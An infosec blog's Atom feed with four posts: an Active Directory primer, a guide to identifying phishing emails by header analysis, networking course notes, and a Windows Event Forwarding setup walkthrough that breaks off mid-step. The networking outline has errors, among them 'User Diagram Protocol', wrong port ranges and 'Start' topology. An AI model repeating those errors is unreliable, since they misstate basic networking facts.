<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://blog.anotsodev.me/feed.xml" rel="self" type="application/atom+xml" /><link href="https://blog.anotsodev.me/" rel="alternate" type="text/html" /><updated>2026-06-17T02:23:16+00:00</updated><id>https://blog.anotsodev.me/feed.xml</id><title type="html">anotsodev</title><subtitle>Posting InfoSec related contents and writeups.</subtitle><entry><title type="html">Attacking and Defending Active Directory Part I</title><link href="https://blog.anotsodev.me/2020/04/19/attacking-and-defending-active-directory-part-i.html" rel="alternate" type="text/html" title="Attacking and Defending Active Directory Part I" /><published>2020-04-19T00:00:00+00:00</published><updated>2020-04-19T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2020/04/19/attacking-and-defending-active-directory-part-i</id><content type="html" xml:base="https://blog.anotsodev.me/2020/04/19/attacking-and-defending-active-directory-part-i.html"><![CDATA[<h2 id="introduction">Introduction</h2>

<p><a href="https://en.wikipedia.org/wiki/Active_Directory">Microsoft Active Directory</a> is one of the most interesting services to attack since we can gather a lot of information just by checking if the server is misconfigured which enables us to enumerate treasure trove of information like Domain Users, Administrative Shares, Password Policies and many more.</p>

<p>In this series, I will be separating this into three parts. The first part will include the introduction of Active Directory and its components.</p>

<p>The second part will include different types of attacks against Active Directory and the demonstration on how to execute these attacks.</p>

<p>And lastly, we’ll be covering different approaches in defending and reducing attack surfaces of Active Directory.</p>

<h2 id="what-is-active-directory">What is Active Directory?</h2>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/active-directory-logo.png?resize=600%2C283&amp;ssl=1" alt="" /></p>

<p>Active Directory or AD is a centralized Windows OS directory service that stores information about objects on the network and automates the management of user data, security, and distributed resources.</p>

<h2 id="active-directory-components">Active Directory Components</h2>

<p><img src="https://i2.wp.com/anotsodev.me/wp-content/uploads/2020/04/Components.png?fit=1024%2C683&amp;ssl=1" alt="" /></p>

<p>Just to give you an overview of the different components of Active Directory, the Active Directory consists of:</p>

<ul>
  <li><strong>Domains</strong></li>
  <li><strong>Forests</strong></li>
  <li><strong>Sites</strong></li>
  <li><strong>Domain Controllers</strong></li>
  <li><strong>Organizational Units (OU)</strong></li>
</ul>

<p>Each of these components has their own purpose that enables Active Directory to function within an organization.</p>

<p>I will just summarize the meanings and functions of these components but you can read more about Active Directory on the <a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview">official documentation</a> of Microsoft.</p>

<h3 id="domains">Domains</h3>

<p>Active Directory domains are where the users and computers are located. Each domain holds a database that contains the information of an object’s identity.</p>

<p>For example, I have an AD domain called internal.anotsodev.org. This domain contains all the information of users and computers joined in this domain.</p>

<h3 id="forests">Forests</h3>

<p>Active Directory forests are the topmost logical containers of the hierarchy. The illustration below shows the organizational domain forest model of <strong>internal.anotsodev.org</strong>.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/AD-Forest.png?resize=633%2C412&amp;ssl=1" alt="" /></p>

<h3 id="sites">Sites</h3>

<p>Active Directory Domain Sites enables the users to authenticate with the nearest domain controller and provides domain preference either administrative or least privilege to the current logged in user.</p>

<p>Sites are organized by one or more IP subnets based on the geographic location of the domain users joined to a domain.</p>

<h3 id="domain-controllers">Domain Controllers</h3>

<p>Active Directory Domain Controllers handles authentication requests and verifies users if they have access to domain resources. Domain Users’ preference and permissions are defined via group policy set to the Domain Controller.</p>

<h3 id="organizational-unit-ou">Organizational Unit (OU)</h3>

<p>An organizational unit (OU) is a subdivision within an Active Directory into which you can place users, groups, computers, and other organizational units. You can create organizational units to mirror your organization’s functional or business structure. Each domain can implement its own organizational unit hierarchy. If your organization contains several domains, you can create organizational unit structures in each domain that are independent of the structures in the other domains.</p>

<p>-</p>

<p>So that ends the first part of the “Attacking and Defending Active Directory” series.</p>

<p>I will be posting the second part of this series which is the actual attacks that are being used against active directories next week.</p>

<p>Stay tuned and be safe!</p>

<p><strong>References:</strong></p>

<ul>
  <li><a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview">https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview</a></li>
  <li><a href="https://www.varonis.com/blog/active-directory-forest/">https://www.varonis.com/blog/active-directory-forest/</a></li>
  <li><a href="https://kb.iu.edu/d/atvu">https://kb.iu.edu/d/atvu</a></li>
  <li><a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview">https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview</a></li>
</ul>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[Introduction Microsoft Active Directory is one of the most interesting services to attack since we can gather a lot of information just by checking if the server is misconfigured which enables…]]></summary></entry><entry><title type="html">How to identify phishing emails</title><link href="https://blog.anotsodev.me/2020/04/11/how-to-identify-phishing-emails.html" rel="alternate" type="text/html" title="How to identify phishing emails" /><published>2020-04-11T00:00:00+00:00</published><updated>2020-04-11T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2020/04/11/how-to-identify-phishing-emails</id><content type="html" xml:base="https://blog.anotsodev.me/2020/04/11/how-to-identify-phishing-emails.html"><![CDATA[<p>This blog post will help you identify phishing emails and learn what are the tools being used in checking if the sender and links are legitimate.</p>

<p>The scenario in the next section will tell you the example of phishing email attacks and their consequences.</p>

<p>So let’s say you have received an email that is very similar to the services that you are frequently using. For example, from Paypal saying that someone logged in to your account, or from coins.ph (digital wallet used in the Philippines) saying that you have an unclaimed reward because you and your friends are verified.</p>

<p>Since it has gotten your attention and you are indeed convinced that you have a reward waiting to be claimed, you unknowingly ignored the red flags such as the email address of the sender and the inconsistencies of the email format. So you clicked the button and it redirected you to a familiar site but with an unfamiliar URL. Now you entered your credentials and clicked the login button but instead of prompting you to enter the authentication code from your 2FA device, it redirected you to the real site of that service you are using.</p>

<p>Now you are wondering, what happened? Let me tell you…</p>

<p><strong>You just got phished!</strong></p>

<p>The fake site where you entered your credentials has already gotten your login information. Your email address, your username, and password. Everything.</p>

<p>So if you are using similar credentials to other services, you are basically <em>f’d</em> <em>up</em>.</p>

<p>Now, to protect you and help you to be vigilant. Take your time to read this post and familiarize yourself with several characteristics about the emails that you have received that would indicate that these could be phishing emails.</p>

<p>This post will cover the basic approach to identify phishing emails.</p>

<p>Just to give you the overview, here’s the outline of this post.</p>

<ul>
  <li>Identify phishing emails by Internet Headers analysis and Email Reputation Lookup</li>
  <li>Containment Approaches</li>
  <li>Summary</li>
</ul>

<h2 id="identify-phishing-emails-by-internet-headers-analysis-and-email-reputation-lookup">Identify phishing emails by Internet Headers analysis and Email Reputation Lookup</h2>

<p>In this section, you will learn how to analyze headers and identify the source IP of the sender or the relay server that they have used to send the phishing email.</p>

<p>We’ll be using this tool called <a href="https://mxtoolbox.com/EmailHeaders.aspx">MxToolbox</a>. You may read the brief description from their site to learn more.</p>

<blockquote>
  <p>ABOUT EMAIL HEADERS</p>

  <p>This tool will make email headers human readable by parsing them according to RFC 822. Email headers are present on every email you receive via the Internet and can provide valuable diagnostic information like hop delays, anti-spam results and more.</p>
</blockquote>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image.png?fit=1024%2C372&amp;ssl=1" alt="" /></p>

<p>MxToolbox Email Header Analyzer</p>

<p>So before we use this tool, let’s get first the internet headers from the suspected phishing email. I will be using the internet headers of the email that was sent to my Protonmail address.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-1.png?resize=1008%2C808&amp;ssl=1" alt="" /></p>

<p>Coins.ph phishing email sent to Protonmail</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-2.png?fit=1024%2C517&amp;ssl=1" alt="" /></p>

<p>Example email sent to Gmail</p>

<p>You may view the internet headers of your email on Protonmail by clicking the dropdown button then <strong>View Headers</strong>. On gmail, click the ‘kebab’ (<em>three</em>  vertical  <em>dots</em>) button then Show original.</p>

<p>After clicking the <strong>View Headers</strong> or <strong>Show Original</strong> button, just copy all the content then paste it to the email header analyzer tool then click the Analyze Header button.</p>

<p>After you submit the internet headers for analysis, you’ll see this page which contains the summary of the analysis.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-3.png?fit=1024%2C504&amp;ssl=1" alt="" /></p>

<p>Header Analysis Summary</p>

<p>On this email, you may notice that the sender used Gmail to send his/her phishing email</p>

<p>Since we know that Gmail IPs are reputable and are not really dangerous, let’s just use another phishing email internet header for the sake of demonstrating the identification of dangerous sender’s source IP.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-4.png?resize=1170%2C267&amp;ssl=1" alt="" /></p>

<p>Email sent from blacklisted/spammer IP</p>

<p>So you may notice that the sender’s IP is <strong>185.234.219.119</strong>. We can copy the IP address to check its reputation using open-source intelligence services such as <strong><a href="https://talosintelligence.com/">Talos Intelligence</a></strong> by Cisco.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-5.png?resize=1170%2C768&amp;ssl=1" alt="" /></p>

<p>IP Reputation Lookup result</p>

<p>By using this tool, you can see details such as the location, reputation, owner, content, and blacklists that may help you to assess how dangerous the sender is.</p>

<p>Now, let’s move back to the MxToolbox analysis result to get more details about the email.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/04/image-7.png?resize=1170%2C532&amp;ssl=1" alt="" /></p>

<p>Headers Found</p>

<p>You may notice that the display name of the sender is not consistent compared to his/her email address. So this will hint us that the email is not really legitimate.</p>

<p>For the header name starting with “X-“, these are custom header and proprietary set by relay servers or mail gateways.</p>

<p>Let’s now move on to the next section, which is the containment approaches if you unknowingly entered your credentials to the phishing site.</p>

<h2 id="containment-approaches">Containment Approaches</h2>

<p>Let’s say you have entered your credentials to the phishing site and redirected you to the official site, you kept wondering why it did not prompt you to enter 2FA code. You checked again the email and saw that the sender’s details are not consistent, you have realized that you have entered your credentials to a phishing site since you did not notice the URL since you were using your phone when you clicked the link embedded on the email.</p>

<p>So what should you do about this incident?</p>

<p>These are the steps that you <strong>MUST</strong> do to contain and prevent the attacker to abuse your credentials:</p>

<ol>
  <li>Install a password manager (1password, Enpass, or Bitwarden) then generate hard to guess password then change your password immediately</li>
  <li>Log-out all the sessions of your account</li>
  <li>If you are using similar login details on other services, change their passwords immediately</li>
  <li>Install virus scanner software then run a full scan in case of malicious executables downloaded on your device</li>
  <li>Delete the email on your inbox</li>
</ol>

<p>After doing these steps, you have now ensured that your account is safe again and won’t be abused by the attacker.</p>

<h2 id="summary">Summary</h2>

<p>Just to summarize the topics that I’ve discussed here, we tackled how to spot phishing emails by checking the internet headers and using tools such as <strong>MxToolbox</strong> and <strong>Talos Intelligence</strong> to aid us with our analysis. Lastly, we tackled the necessary steps in securing your account again after being a victim of phishing.</p>

<p>So that’s it! I hope you have learned new technologies and tools by reading this blog post. I will be posting more guides and tutorials again soon whenever I have time.</p>

<p>May the force be with you.</p>

<p><a href="https://www.freepik.com/free-photos-vectors/abstract">Featured Image created by katemangostar – www.freepik.com</a></p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[This blog post will help you identify phishing emails and learn what are the tools being used in checking if the sender and links are legitimate. The scenario in the next section will tell you the …]]></summary></entry><entry><title type="html">Networking Concepts and Protocols</title><link href="https://blog.anotsodev.me/2020/03/28/networking-concepts-and-protocols.html" rel="alternate" type="text/html" title="Networking Concepts and Protocols" /><published>2020-03-28T00:00:00+00:00</published><updated>2020-03-28T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2020/03/28/networking-concepts-and-protocols</id><content type="html" xml:base="https://blog.anotsodev.me/2020/03/28/networking-concepts-and-protocols.html"><![CDATA[<p>This blog post contains the Networking Concepts and Protocols course that can be enrolled in Pluralsight. Feel free to skim this outline to get a high-level overview of the topics that were discussed on the course.</p>

<h2 id="introduction">Introduction</h2>

<ul>
  <li>What is networking?</li>
  <li>Concepts</li>
  <li>Modeling network communication</li>
</ul>

<h2 id="data-networking">Data Networking</h2>

<ul>
  <li>Data moving from a device to another device</li>
</ul>

<h2 id="understanding-data-networking">Understanding Data Networking</h2>

<ul>
  <li>protocols to protocols</li>
</ul>

<h3 id="modeling-systems">Modeling Systems</h3>

<ul>
  <li>
    <ul>
      <li>Concept
        <ul>
          <li>Language</li>
          <li>Link</li>
          <li>Physical</li>
        </ul>
      </li>
    </ul>
  </li>
</ul>

<h3 id="the-osi-model">The OSI Model</h3>

<ul>
  <li>Open Systems Interconnect</li>
</ul>

<h4 id="physical-layer-layer-1">Physical Layer (Layer 1)</h4>

<ul>
  <li>Physical Devices</li>
  <li>Cables
    <ul>
      <li>Twisted Pair</li>
      <li>CoAx</li>
      <li>Fiber Optics</li>
      <li>Copper</li>
    </ul>
  </li>
</ul>

<h4 id="data-link-layer-layer-2">Data Link Layer (Layer 2)</h4>

<ul>
  <li>Ethernet</li>
  <li>DOCSIS-3 (ISP to Internet)</li>
  <li>Move data from one device to another device</li>
</ul>

<h4 id="network-layer-layer-3">Network Layer (Layer 3)</h4>

<ul>
  <li>IP Addressing</li>
  <li>IP Routing</li>
</ul>

<h4 id="transport-layer-layer-4">Transport Layer (Layer 4)</h4>

<ul>
  <li>Session between client and server</li>
  <li>TCP – Transmission Control Protocol</li>
  <li>UDP – User Diagram Protocol</li>
</ul>

<h4 id="session-layer-layer-5">Session Layer (Layer 5)</h4>

<h4 id="presentation-layer-layer-6">Presentation Layer (Layer 6)</h4>

<ul>
  <li>Decoding ASCII</li>
  <li>EBCDIC (IBM Encoding)</li>
</ul>

<h4 id="application-layer-layer-7">Application Layer (Layer 7)</h4>

<ul>
  <li>HTTP</li>
  <li>HTTPS</li>
</ul>

<h2 id="protocols-and-port-numbers">Protocols and Port Numbers</h2>

<h4 id="application-layer-protocols-layer-7">Application Layer Protocols (Layer 7)</h4>

<ul>
  <li>Transferring Data</li>
  <li>Hypertext Transfer Protocols
    <ul>
      <li>HTTP (Layer 4 port: 80)</li>
      <li>HTTPS (Layer 4 port: 443)</li>
    </ul>
  </li>
  <li>File Transfer Protocols
    <ul>
      <li>FTP (Port 20)</li>
      <li>sFTP (Port 22)
        <ul>
          <li>FTP over SSH</li>
        </ul>
      </li>
      <li>TrivialFTP (Port 69)
        <ul>
          <li>Used to transfer files without authentication</li>
        </ul>
      </li>
      <li>SMB (Port 445)</li>
    </ul>
  </li>
  <li>Email Protocols
    <ul>
      <li>SMTP (Port 25/465/587)
        <ul>
          <li>Used for outbound emails</li>
        </ul>
      </li>
      <li>POP3 (Port 110/995) /IMAP (Port 143/993)
        <ul>
          <li>Used for inbound emails</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Authentication Protocols
    <ul>
      <li>LDAP (Port 389)</li>
      <li>LDAPs (Port 636)</li>
    </ul>
  </li>
  <li>Network Services
    <ul>
      <li>DHCP</li>
      <li>DNS</li>
      <li>NTP</li>
    </ul>
  </li>
  <li>Network Management
    <ul>
      <li>Telnet</li>
      <li>SSH</li>
      <li>SNMP</li>
      <li>RDP</li>
    </ul>
  </li>
  <li>Audio/Video Protocols
    <ul>
      <li>H.323</li>
      <li>1720</li>
      <li>SIP</li>
    </ul>
  </li>
</ul>

<h4 id="transport-layer-protocols-layer-4">Transport Layer Protocols (Layer 4)</h4>

<ul>
  <li>TCP
    <ul>
      <li>Transmission Control Protocol</li>
      <li>Uses 3-way handshake to establish session with other devices
        <ul>
          <li>SYN – SYN/ACK – ACK</li>
        </ul>
      </li>
      <li>Uses 4-way disconnect to end established session with other devices
        <ul>
          <li>FIN – FIN/ACK – FIN – FIN/ACK</li>
          <li>RST
            <ul>
              <li>Immediately end established session</li>
            </ul>
          </li>
        </ul>
      </li>
    </ul>
  </li>
  <li>UDP
    <ul>
      <li>User Diagram Protocol</li>
      <li>Only sent packets without any sequence</li>
      <li>Does not establish session</li>
    </ul>
  </li>
</ul>

<h4 id="transport-layer-addressing">Transport Layer Addressing</h4>

<ul>
  <li>Port Numbers</li>
  <li>
    <ul>
      <li>Well Known – 1024 – 49151</li>
    </ul>
  </li>
  <li>Client Port Numbers (Temporary)
    <ul>
      <li>49152 – 61535</li>
    </ul>
  </li>
</ul>

<h2 id="binary-and-hexadecimal">Binary and Hexadecimal</h2>

<ul>
  <li>Base 2 (0 – 1)</li>
  <li>Base 10 (0 – 9)</li>
  <li>Base 16 (0 – 15) (0 – F)</li>
</ul>

<h2 id="introduction-to-ip-addressing">Introduction to IP Addressing</h2>

<ul>
  <li>Classful</li>
  <li>Classless</li>
  <li>What is an IP address?
    <ul>
      <li>[ 192.168.1 ] – Network Portion [.1 ] – Host Portion</li>
    </ul>
  </li>
  <li>Classless Addressing
    <ul>
      <li>Subnet Mask
        <ul>
          <li>Network portion where all bits are filled</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Classful Addressing
    <ul>
      <li>Unicast
        <ul>
          <li>Class A</li>
          <li>Class B</li>
          <li>Class C</li>
        </ul>
      </li>
      <li>Multicast
        <ul>
          <li>Class D</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Address Types
    <ul>
      <li>IP Address Types
        <ul>
          <li>Network Address
            <ul>
              <li>Identifier for a group of devices</li>
            </ul>
          </li>
          <li>Broadcast Address
            <ul>
              <li>Identifier for all devices on a network</li>
            </ul>
          </li>
          <li>Host Address
            <ul>
              <li>Identifies unique device on a network</li>
            </ul>
          </li>
        </ul>
      </li>
      <li>Network Address</li>
      <li>CIDR Notation
        <ul>
          <li>Example: 10.1.1.0/24</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Subnetting Networks
    <ul>
      <li>Variable Length Subnet Masking</li>
    </ul>
  </li>
  <li>Introduction to IPV6
    <ul>
      <li>128 bits long</li>
      <li>32 nibbles</li>
      <li>8 hextets</li>
      <li>Network Portion = 64 bits</li>
      <li>Interface Identifier = 64 bits</li>
      <li>Leading 0’s =::</li>
      <li>2^64 available hosts</li>
      <li>Additional Details
        <ul>
          <li>Dual Stack</li>
          <li>Unicast Address</li>
          <li>fe80 = Link Local Address</li>
        </ul>
      </li>
      <li>IPV6 Address Acquisition
        <ul>
          <li>SLAAC
            <ul>
              <li>Windows
                <ul>
                  <li>Random 64 bit Interface Identifier</li>
                </ul>
              </li>
              <li>Unix
                <ul>
                  <li>Modified EUI-64
                    <ul>
                      <li>Get MAC Address</li>
                      <li>Break into half</li>
                      <li>add ff:fe in the middle</li>
                      <li>flip 7th bit on the first 8 bits</li>
                    </ul>
                  </li>
                </ul>
              </li>
            </ul>
          </li>
          <li>Neighbor Advertisement</li>
        </ul>
      </li>
      <li>IPV6 Tunneling
        <ul>
          <li>Local router creates a tunnel to the IPv6 router to acquire IPv6 address to access resources.</li>
        </ul>
      </li>
    </ul>
  </li>
</ul>

<h2 id="ethernet-and-switching">Ethernet and Switching</h2>

<ul>
  <li>Layer 2 allows traffic between devices</li>
  <li>Carrier Sense Multiple Access with Collision Detection (CSMA/CD)
    <ul>
      <li>Collision Domain</li>
    </ul>
  </li>
  <li>Duplex and speed
    <ul>
      <li>Half Duplex – one device communicates at a time
        <ul>
          <li>Walkietalkie</li>
        </ul>
      </li>
      <li>Full Duplex – simultaneous communication between devices
        <ul>
          <li>Telephone</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Modern Collision Domain</li>
  <li>Ethernet Speed
    <ul>
      <li>GigabitEthernet speeds require full duplex</li>
    </ul>
  </li>
  <li>Ethernet II Frame
    <ul>
      <li>Destination MAC Address (48 bits)</li>
      <li>Source MAC Address (48 bits)</li>
      <li>Type (16 bits)</li>
      <li>Data (1500 bytes)</li>
      <li>FCS (32 bits)</li>
    </ul>
  </li>
</ul>

<h2 id="network-topologies">Network Topologies</h2>

<ul>
  <li>BUS</li>
  <li>Ring</li>
  <li>Start</li>
</ul>

<h2 id="switch">Switch</h2>

<ul>
  <li>MAC Address Table</li>
  <li>Broadcast
    <ul>
      <li>Layer 2 Broadcast address
        <ul>
          <li>Destination MAC address is all FFF…</li>
        </ul>
      </li>
      <li>Broadcast domain – group of devices on a local area network</li>
    </ul>
  </li>
  <li>Features
    <ul>
      <li>Broadcast storms prevention</li>
      <li>VLANs</li>
      <li>Mirroring switch ports</li>
    </ul>
  </li>
  <li>Connecting Switches
    <ul>
      <li>Broadcast Messages</li>
      <li>Broadcast Storm</li>
      <li>Spanning Tree Protocols
        <ul>
          <li>Shuts down redundancy</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>VLANs (Broadcast Domain)
    <ul>
      <li>Trunk Link – connects switches that are using VLNS</li>
      <li>Adds additional details pointing to destination VLAN</li>
      <li>Also called as Tagged Ports</li>
      <li>Trunklinks/Access links</li>
    </ul>
  </li>
  <li>Switch Port Mirroring
    <ul>
      <li>Collects traffic to analyze problems within network</li>
      <li>Mirror the traffic of any port that we want</li>
    </ul>
  </li>
</ul>

<h2 id="power-over-ethernet-poe">Power over Ethernet (POE)</h2>

<ul>
  <li>Gives power to connected devices</li>
</ul>

<h2 id="ip-routing">IP Routing</h2>

<ul>
  <li>Routers
    <ul>
      <li>2 Interfaces to operate
        <ul>
          <li>Has unique IP Network</li>
        </ul>
      </li>
      <li>IP Packet
<img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/03/ip-packet.png?resize=499%2C283&amp;ssl=1" alt="IP Packet" /></li>
    </ul>
  </li>
  <li>
    <ul>
      <li>ARP (Layer 2 Protocol)
    - Retrieves layer 2 address using layer 3 address
    - Device maintains an ARP cache
    - ARP cache will age out entries
    - Bridge between L2 and L3
        <ul>
          <li>Default Gateway (Router)
            <ul>
              <li>ARP Default gateway</li>
              <li>All router must be configured to forward traffic to the right gateway</li>
              <li>IP segments of the destination addresses must be configured to the gateway</li>
              <li>Every time a packet traversed gateway, its TTL will be decreased by 1</li>
              <li>Static Routing</li>
              <li>Dynamic outing
                <ul>
                  <li>Routing Protocols
                    <ul>
                      <li>RIP</li>
                      <li>EIGRP</li>
                      <li>OSPF</li>
                      <li>BGP</li>
                    </ul>
                  </li>
                </ul>
              </li>
            </ul>
          </li>
          <li>Tools
            <ul>
              <li>tracert</li>
            </ul>
          </li>
        </ul>
      </li>
    </ul>
  </li>
</ul>

<h2 id="network-services">Network Services</h2>

<ul>
  <li>Network Topologies
    <ul>
      <li>LAN/WLAN</li>
      <li>WAN
        <ul>
          <li>CAN</li>
          <li>MAN</li>
        </ul>
      </li>
      <li>SAN</li>
      <li>PAN</li>
    </ul>
  </li>
</ul>

<h2 id="network-address-translation">Network Address Translation</h2>

<ul>
  <li>To communicate with the Internet</li>
  <li>What it does
    <ul>
      <li>Temporarily change the private source IP to a public source IP address</li>
    </ul>
  </li>
  <li>Port Address Translation</li>
</ul>

<h2 id="port-forwarding">Port Forwarding</h2>

<ul>
  <li>Socket – IP:PORT
    <ul>
      <li>192.168.1.1:1337</li>
    </ul>
  </li>
</ul>

<h2 id="access-control-lists">Access Control Lists</h2>

<ul>
  <li>Allow/Deny destination or source IP addresses</li>
</ul>

<h2 id="dhcp">DHCP</h2>

<ul>
  <li>Client will send discover message</li>
  <li>DHCP Offer</li>
  <li>DHCP Binding</li>
  <li>IP Helper Address</li>
</ul>

<h2 id="dns-hierarchy">DNS Hierarchy</h2>

<ul>
  <li>Uniform Resource Locator (URL)
    <ul>
      <li>TLD (.com,.net,.org)</li>
      <li>SLD (google.com, trendmicro.com)</li>
      <li>Third Level domain (www)</li>
      <li>Subdomain (www.xxx.trendmicro.com)</li>
      <li>Reverse DNS Lookup
        <ul>
          <li>DNS Record Types
            <ul>
              <li>A – IPv4 Record</li>
              <li>AAAA – IPv6 Record</li>
              <li>CNAME – Canonical Name Record (Alias)</li>
              <li>MX – Mail Exchange Record</li>
              <li>NS – Identifies Authoritative Name Server</li>
              <li>PTR – Pointer Record</li>
              <li>SRV – Service Record</li>
              <li>TXT – miscellaneous use</li>
            </ul>
          </li>
        </ul>
      </li>
    </ul>
  </li>
</ul>

<h2 id="internal-vs-external-dns">Internal vs External DNS</h2>

<ul>
  <li>Internal domain name system zone</li>
  <li>External domain name system zone
    <ul>
      <li>Uses Internet’s DNS</li>
    </ul>
  </li>
</ul>

<p><strong>Course Reference:</strong></p>

<p><a href="https://app.pluralsight.com/library/courses/comptia-network-plus-networking-concepts/">Pluralsight – Networking Concepts and Protocols</a></p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[This blog post contains the Networking Concepts and Protocols course that can be enrolled in Pluralsight. Feel free to skim this outline to get a high-level overview of the topics that were discuss…]]></summary></entry><entry><title type="html">Poor man’s log collection on Windows</title><link href="https://blog.anotsodev.me/2020/03/27/poor-man-s-log-collection-on-windows.html" rel="alternate" type="text/html" title="Poor man’s log collection on Windows" /><published>2020-03-27T00:00:00+00:00</published><updated>2020-03-27T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2020/03/27/poor-man-s-log-collection-on-windows</id><content type="html" xml:base="https://blog.anotsodev.me/2020/03/27/poor-man-s-log-collection-on-windows.html"><![CDATA[<h2 id="introduction">Introduction</h2>

<p>As your organization grows, a lot more log collectors either commercial or freeware are needed to be installed on your network to get logs from different servers running on Windows or *nix.</p>

<p>Let’s say for example this organization called <strong>kyle.biz</strong> has implemented Arcsight SmartConnectors deployed on Linux servers to get event logs on Windows. And based on my experience, setting up the SmartConnectors is tedious and maintaining them is sometimes a pain.</p>

<p>The limitations were also realized since SmartConnector only gets logs on the server static IPs configured during the installation so there is no way we’ll get the logs from other machines that have dynamic IPs.</p>

<p>Upon research, our team has stumbled upon this article from Microsoft’s <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection">documentation page</a> and saw that Windows has already built-in log forwarding feature which is powerful and easy to configure!</p>

<p>So without further ado, let’s now configure the Source Initiated WEC and WEF on our servers!</p>

<h2 id="prerequisites">Prerequisites</h2>

<p><strong>Windows Event Collector</strong></p>

<ul>
  <li><strong>OS:</strong> Windows Server 2016</li>
  <li><strong>Hostname:</strong> WEC01.internal.kyle.biz</li>
  <li><strong>RAM:</strong> 16GB</li>
  <li><strong>CPU:</strong> 4 Cores</li>
  <li><strong>Storage:</strong>
    <ul>
      <li>Drive C:\ – 50GB</li>
      <li>Drive D:\ – 60GB (we’ll save our forwarded logs here)</li>
    </ul>
  </li>
  <li>Joined in a domain.</li>
</ul>

<p><strong>Windows Event Source</strong></p>

<ul>
  <li><strong>OS:</strong> Windows Server 2016</li>
  <li><strong>Hostname:</strong> CONSOLESERVER01.internal.kyle.biz</li>
  <li>Joined in a domain.</li>
</ul>

<h2 id="wec-server-configuration">WEC Server Configuration</h2>

<p>On the following steps, we’ll be configuring our collector server to receive logs which will be initiated by source computers.</p>

<p><strong>Step 1:</strong> Open the Event Viewer and click the <strong>Subscription</strong>.</p>

<p><strong>Step 2:</strong> Right-click the Subscription to create a new Subscription. You can also see other actions on the right pane of the window.</p>

<p><img src="https://i1.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-8.png?fit=818%2C490&amp;ssl=1" alt="" /></p>

<p><strong>Step 3</strong>: Enter the subscription name and select the subscription type as <strong>Source computer initiated.</strong></p>

<p><em>Before we proceed in adding <strong>computer groups,</strong> let’s first configure the events to collect and advanced settings.</em></p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-4.png?resize=574%2C559&amp;ssl=1" alt="" /></p>

<p><strong>Step 4:</strong> Click the Select Events then click the manual edit/XML tab then copy the XML format query here: <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection#appendix-e--annotated-baseline-subscription-event-query">Appendix E – Annotated baseline subscription event query</a></p>

<p><strong>Step 5:</strong> Click OK</p>

<p><strong>Step 6:</strong> Click the Advanced Settings then select Minimize Latency.</p>

<p><strong>Step 7:</strong> Click OK</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-1.png?resize=581%2C557&amp;ssl=1" alt="" /></p>

<p><strong>Step 8:</strong> We’ll now add our domain computers by clicking <strong>Select Computer Groups</strong>.</p>

<p><strong>Step 9:</strong> Since we are joined in a domain, click Add <strong>Domain Computers</strong> then search for the hostname of the event source. (Ex: CONSOLESERVER01.internal.kyle.biz)</p>

<p><strong>Step 10:</strong> Click OK</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-7.png?resize=619%2C606&amp;ssl=1" alt="" /></p>

<p><strong>Step 11:</strong> Right-click the Forwarded Events then click on properties</p>

<p><strong>Step 12:</strong> Create folder <strong>Winenvt\Logs</strong> on drive D:\ then replace the log path by entering <strong>D:\Winevt\Logs\ForwardedEvents.evtx</strong> or refer to the screenshot below.</p>

<p><img src="https://i2.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-6.png?fit=818%2C537&amp;ssl=1" alt="" /></p>

<h2 id="event-source-configuration">Event Source Configuration</h2>

<p>On the following steps, we’ll be configuring the source computers to forward logs to our collector server.</p>

<p><strong>Step 1:</strong> Let’s now configure our event source server machine to point the SubscriptionManagers to our <strong>WEC</strong>.</p>

<p><strong>Step 2:</strong> Open the Local Group Policy then click the <strong>Event Forwarding</strong> to see the items under that directory.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/03/image.png?fit=818%2C451&amp;ssl=1" alt="" /></p>

<p><strong>Step 3:</strong> Click the <strong>Configure target Subscription Manager</strong> and enter on the value</p>

